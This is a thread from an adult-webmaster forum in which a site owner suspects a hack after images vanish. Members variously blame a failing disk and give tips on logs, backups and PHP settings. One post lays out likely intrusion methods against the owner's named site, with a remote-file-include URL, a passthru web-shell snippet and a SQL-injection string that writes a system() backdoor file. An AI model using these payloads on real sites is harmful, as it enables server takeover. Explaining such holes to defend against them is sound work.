|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
|
|
#1 |
|
Too old to care
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
|
We got hacked.
Well we think it's the only way the problem on the site could of happened.
A few weeks ago images started to disappear and at first I thought it was the webmaster responsible for the content slipping up. But over the weekend I noticed it was getting far worse and in every set we're missing 5 to 10 images. So we are in the process of reloading the entire site, a nightmare job and will be down for at least another day. It's not just the reloading but also the creating of new catalogued pictures that are missing. Was in the office until 1.00 last night working at it. Thanks to Bailey at www.sapphicerotica.com for helping us out and letting us use his connection for uploading, it's faster than ours. |
|
|
|
|
|
#2 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Dec 2004
Location: Happy in the dark.
Posts: 93,652
|
Fuckersssss!! i hope things get back to normal asap !!
__________________
Vacares - Web Hosting, Domains, O365, Security & More - Paxum and BTC Accepted Windows VPS now available Great for TSS, Nifty Stats, remote work, virtual assistants, etc. |
|
|
|
|
|
#3 |
|
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
|
yeah thats a typical thing for hackers to do.. removing pictures.. very slowly.. day by day..
|
|
|
|
|
|
#4 |
|
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
|
oi bet they have an elite cr3w of hackers each responsible for the pic assigned to him/her. They work globally you know.
|
|
|
|
|
|
#5 |
|
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
|
they probably discussed and planned this attack months in advance on some underground IRC channel. Or maybe a convention.
You should write a book about the vicious attack. |
|
|
|
|
|
#6 |
|
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
|
Maybe they also got acces to your GFY account.
WARNING TO ALL READERS Dont give out passwords in this thread if Charly asks for it.. it could be the hacker social engineering. |
|
|
|
|
|
#7 | |
|
Too old to care
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
|
Quote:
But yes I do see it as strange they would take out random images. |
|
|
|
|
|
|
#8 | |
|
salad tossing sig guy
Join Date: Apr 2002
Location: mrthumbs*gmail.com
Posts: 11,702
|
Quote:
How is it updated? Anyway.. http://www.paulmarkham.com/all-adult-content.php |
|
|
|
|
|
|
#9 |
|
Confirmed User
Join Date: Feb 2004
Posts: 3,505
|
You need to stop using you know what as the password for everything, I've told you before on two seperate occasions.
|
|
|
|
|
|
#10 | |
|
Too old to care
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
|
Quote:
And all the updated and changed. Yes the server is dedicated and all the image content is on one disc which is again protected, but with FTP access this might have given someone access. The site is updated as we add new content which is a full time operation. Well nearly. |
|
|
|
|
|
|
#11 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2002
Posts: 55,372
|
first mistake is not to announce that you got hacked.
things you keep hush hush |
|
|
|
|
|
#12 | |
|
Too old to care
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
|
Quote:
|
|
|
|
|
|
|
#13 |
|
Damn Right I Kiss Ass!
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,421
|
Put it back up and I'll tell ya how they did it...
Since you use PHP we will start with some basics... Either 1, you use templates and they were able to use one of their own: http://www.paulmarkham.com/all-adult....php?p=contact Which in code is, Code:
include($p); http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here In there file they included was: Code:
if ($cmd != '') { passthru($cmd); }
http://www.paulmarkham.com/all-adult....php?girl=sara Becomes: Code:
http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'-- Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed. |
|
|
|
|
|
#15 |
|
WINNING!
Industry Role:
Join Date: Oct 2002
Posts: 14,579
|
look at the log files on the server, search for the filename missing, and se who last used or moved it
|
|
|
|
|
|
#16 | |
|
Confirmed User
Join Date: Mar 2004
Posts: 5,116
|
Quote:
|
|
|
|
|
|
|
#17 | |
|
Confirmed User
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
|
Quote:
Do you honestly think Charly's going to grep logs? Or hire someone to do it?
__________________
Perfect Gonzo |
|
|
|
|
|
|
#18 | |
|
WINNING!
Industry Role:
Join Date: Oct 2002
Posts: 14,579
|
Quote:
|
|
|
|
|
|
|
#19 | |
|
Confirmed User
Join Date: Mar 2004
Posts: 5,116
|
Quote:
|
|
|
|
|
|
|
#21 | |
|
Confirmed User
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
|
Quote:
__________________
Perfect Gonzo |
|
|
|
|
|
|
#22 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2002
Posts: 55,372
|
insecure php code rocks.
|
|
|
|
|
|
#23 | ||
|
Too old to care
Industry Role:
Join Date: Jun 2001
Location: On the sofa, watching TV or doing my jigsaws.
Posts: 52,943
|
Quote:
V_RocKs thanks for the programming, all double Dutch to me but I have a guy here who knows about these things. Quote:
|
||
|
|
|
|
|
#24 |
|
Confirmed User
Join Date: Dec 2002
Posts: 542
|
first thing to do is to check /tmp for hidden shellkits ..
so you are uploading the content onto the compromised server again? don't you want to find the security hole first , make a fresh installation and try everything to avoid this happening in the future? make sure to set allow_url_fopen = Off in your php.ini |
|
|
|
|
|
#25 |
|
I like Dutch Girls
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
|
So whats up with daily backups?
__________________
![]() ICQ 16 91 547 - SKYPE dutchteencash bob AT dutchteencash DOT com ... did you see our newest Sweet Natural Girl Priscilla (18)? |
|
|
|
|
|
#26 |
|
Confirmed User
Join Date: Oct 2004
Location: up in gang bang heaven
Posts: 3,726
|
sounds more like a failing harddrive than a hacker, Hackers usally dont fuck with people they just go in for the kill and get it over with, Sounds like its hitting bad clusters or the file system is corrupted..
|
|
|
|
|
|
#27 | |
|
WINNING!
Industry Role:
Join Date: Oct 2002
Posts: 14,579
|
Quote:
Try to run a RAID consistency test |
|
|
|
|
|
|
#28 |
|
SecretFriends.com
Industry Role:
Join Date: May 2001
Location: IMC Headquarters
Posts: 27,889
|
Doesn't sound like a hacker to me but more like a failure in your system.
Btw make sure to make backups daily from now on ;)))
__________________
WE ARE BUYING PAY SITES! CONTACT ME ClubSweethearts | ManUpFilms | SinfulXXX | HOT * AdultPrime * HOT Paying webmasters since 1996! Contact: r.riepen @ sansylgroup.com | telegram: roaldr |
|
|
|
|
|
#29 | |
|
Confirmed User
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
|
Quote:
Who knows... Sounds like a disk issue to me, though.
__________________
Perfect Gonzo |
|
|
|
|
|
|
#30 | |
|
Affiliate
Join Date: Jul 2004
Posts: 28,735
|
Quote:
__________________
M&A Queen |
|
|
|
|
|
|
#31 |
|
Viva la vulva!
Join Date: Mar 2003
Location: you can't please everyone, so you got to please yourself
Posts: 16,557
|
Have you let Lee help you with any problems recently?
|
|
|
|
|
|
#32 |
|
web
Join Date: Dec 2001
Location: On icq: 85-483-060
Posts: 9,533
|
bummer, hope you find how they got in, secure the site and if possible nail the bastards (asking too much)
|
|
|
|
|
|
#33 |
|
Clueless OleMan
Join Date: Mar 2003
Location: ICQ - 169903487
Posts: 11,009
|
nothing better for conversions, traffic, and bookmarks than to have a site down for a day or more
|
|
|
|
|
|
#34 | |
|
WINNING!
Industry Role:
Join Date: Oct 2002
Posts: 14,579
|
Quote:
The old Compaq smartarrayII verion 2.. GOD dam they fucked the systems.. We had more than 30 proliant800 placed in danish banks There were new softpaq's to them every month |
|
|
|
|
|
|
#35 | |
|
I like Dutch Girls
Join Date: Feb 2003
Location: dutchteencash.com
Posts: 21,684
|
Quote:
__________________
![]() ICQ 16 91 547 - SKYPE dutchteencash bob AT dutchteencash DOT com ... did you see our newest Sweet Natural Girl Priscilla (18)? |
|
|
|
|